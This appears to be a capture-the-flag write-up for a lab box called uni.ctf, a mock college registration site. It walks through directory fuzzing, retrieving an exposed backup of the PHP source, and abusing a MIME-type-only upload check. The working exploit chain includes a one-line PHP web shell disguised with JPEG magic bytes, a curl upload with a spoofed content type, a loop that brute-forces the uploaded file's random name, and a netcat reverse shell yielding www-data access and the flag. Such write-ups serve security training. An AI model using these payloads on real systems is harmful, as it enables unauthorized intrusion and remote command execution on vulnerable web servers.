Recon
nmap
1
2
3
4
| PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.67 ((Debian))
|_http-title: Yekolo Temari College
|_http-server-header: Apache/2.4.67 (Debian
|
FFUF
1
2
3
4
5
6
| index.php
media
uploads
assets
student.php
.html
|
i enumerate each director’s
1
2
| ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media/FUZZ -ac -e .php,.html,.bak,.zip
ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/media//images/FUZZ -ac -e .php,.html,.bak,.zip
|
index.html some interesting thing in the assets
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://uni.ctf/assets/FUZZ -ac -e .php,.html,.bak,.zip
|
backup.zip OK download it and extract the info
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| └─$ wget http://uni.ctf/assets/backup.zip
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$ ls
backup.zip
┌──(neo㉿neo)-[~/uni-ctf/]
└─$ unzip backup.zip
Archive: backup.zip
creating: backup/
inflating: backup/index.php
inflating: backup/student.php
┌──(neo@neo-localhost)-[~/uni-ctf/]
└─$ cd backup && ls
index.php student.php
┌──(neo㉿neo)-[~/uni-ctf/backup]
└─$
|
some thing we have now is the php procces
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| $ cat student.php
<?php
$message = '';
$status = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$name = trim($_POST['full_name'] ?? '');
$email = trim($_POST['email'] ?? '');
$department = trim($_POST['department'] ?? '');
if (!isset($_FILES['student_image']) || $_FILES['student_image']['error'] !== UPLOAD_ERR_OK) {
$message = 'Please upload your image.';
$status = 'error';
} else {
$allowed = ['image/jpeg', 'image/png'];
$type = $_FILES['student_image']['type'] ?? '';
if (!in_array($type, $allowed, true)) {
$message = 'Only PNG or JPEG requeired.';
$status = 'error';
} else {
$uploadDir = __DIR__ . '/uploads/';
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0777, true);
}
$originalName = basename($_FILES['student_image']['name']);
$random = str_pad((string)random_int(100, 999), 3, '0', STR_PAD_LEFT);
$savedName = 'yekolo-temari-' . $random . $originalName;
$target = $uploadDir . $savedName;
if (move_uploaded_file($_FILES['student_image']['tmp_name'], $target)) {
$message = 'Thank you for registration we will contact u with your email';
$status = 'success';
} else {
$message = 'Upload failed. Try again later.';
$status = 'error';
}
}
}
}
|
From this code we understand the proccess is gose
- Read form fields
- Check upload exists
- Check reported MIME type
- Create uploads/ if needed
- Rename file
- Move uploaded file
- Show success
shell.php
1
| \xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>
|
1
| echo '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>' > shell.php
|
1
| curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@shell.php;type=image/jpeg" http://uni.ctf/student.php
|
1
2
3
4
5
6
7
8
| for i in $(seq 100 999); do
url="http://uni.ctf/uploads/yekolo-temari-${i}shell.php"
code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
if [ "$code" = "200" ]; then
echo "[+] Found: $url"
break
fi
done
|
1
| [+] Found: http://uni.ctf/uploads/yekolo-temari-996shell.php
|
?cmd=id
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
| ─$ curl -X POST -F "full_name=test" -F "email=test@test.com" -F "department=Computer Science" -F "student_image=@pentest.php;type=image/jpeg" http://uni.ctf/student.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Student Registration</title>
<style>
body{font-family:Arial,sans-serif;background:#f8fafc;padding:30px;color:#1e293b}
.wrap{max-width:780px;margin:0 auto;background:#fff;border-radius:16px;padding:28px;box-shadow:0 10px 30px rgba(0,0,0,.08)}
label{display:block;margin:14px 0 8px;font-weight:700}
input,select{width:100%;padding:12px;border:1px solid #cbd5e1;border-radius:10px}
button{margin-top:18px;background:#2563eb;color:#fff;border:0;padding:12px 18px;border-radius:10px;cursor:pointer}
.msg{margin-bottom:16px;padding:14px;border-radius:10px}
.success{background:#dcfce7;color:#166534}
.error{background:#fee2e2;color:#991b1b}
a{color:#2563eb}
</style>
</head>
<body>
<div class="wrap">
<h1>Yekolo Temari College Registration</h1>
<p>Fill the form below and upload your passport-size photo.</p>
<div class="msg success">Thank you for registration we will contact u with your email</div>
<form method="POST" enctype="multipart/form-data">
<label>Full Name</label>
<input type="text" name="full_name" required>
<label>Email</label>
<input type="email" name="email" required>
<label>Department</label>
<select name="department" required>
<option value="Computer Science">Computer Science</option>
<option value="Civil Engineering">Civil Engineering</option>
<option value="Business Management">Business Management</option>
<option value="Nursing">Nursing</option>
<option value="CyberSecurity">CyberSecurity</option>
</select>
<label>Profile Image (JPEG or PNG)</label>
<input type="file" name="student_image" required>
<button type="submit">Submit Registration</button>
</form>
<p style="margin-top:20px"><a href="/index.php">Back to homepage</a></p>
</div>
</body>
</html>
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do
url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
if [ "$code" = "200" ]; then
echo "[+] Found: $url"
break
fi
done
^C
┌──(neo㉿neo)-[~/pro/backup]
└─$ for i in $(seq 100 999); do
url="http://uni.ctf/uploads/yekolo-temari-${i}pentest.php"
code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
if [ "$code" = "200" ]; then
echo "[+] Found: $url"
break
fi
done
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.8] 34012
Linux 49e853df1514 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux
01:08:30 up 22:38, 0 users, load average: 0.34, 0.37, 0.34
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
dev
etc
flag.txt
home
...
var
$ cat flag.txt
unictf{Br34king_TH3_rul3s}
|